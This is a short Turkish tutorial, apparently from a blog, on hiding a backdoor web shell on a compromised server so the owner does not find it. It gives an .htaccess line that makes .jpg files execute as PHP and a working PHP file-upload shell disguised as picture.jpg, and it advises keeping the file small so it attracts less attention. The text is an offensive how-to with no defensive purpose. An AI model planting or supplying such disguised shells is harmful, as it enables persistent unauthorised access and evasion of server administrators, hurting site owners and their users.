Backdoor Shell Gizleme




Sunucu üzerinde sakladığınız Shell ertesi gün siliniyor olabilir, Bunun sebebi sunucu sahibi sunucudaki sitelerde tüm php dosyalarını inceliyor olması.

Ama shellimizi .jpg yani resim formatına getirirsek bulunmayacaktır. Bulunduğumuz dizine  .htaccess dosyası oluşturup içine bu kodları girelim;
Kod:
AddType application/x-httpd-php .jpg

Şimdi picture.jpg adında bir dosya oluşturup TXT Editor ile açalım ve aşağıdaki php kodlarını ekleyelim
Kod:
<?php
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
   if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
   else { echo '<b>Basarisiz</b><br><br>'; }
}
?>

Artık picture.jpg dosyası .php yani shell formatında çalışacaktır. Picture.jpg içine istediğiniz php kodunu girebilirsiniz ancak dosya boyutu ne kadar yüksek olursa o kadar dikkat çekeceği için bu şekilde kullanmanız daha sağlıklı olur.

Yorumlar

Popüler Yayınlar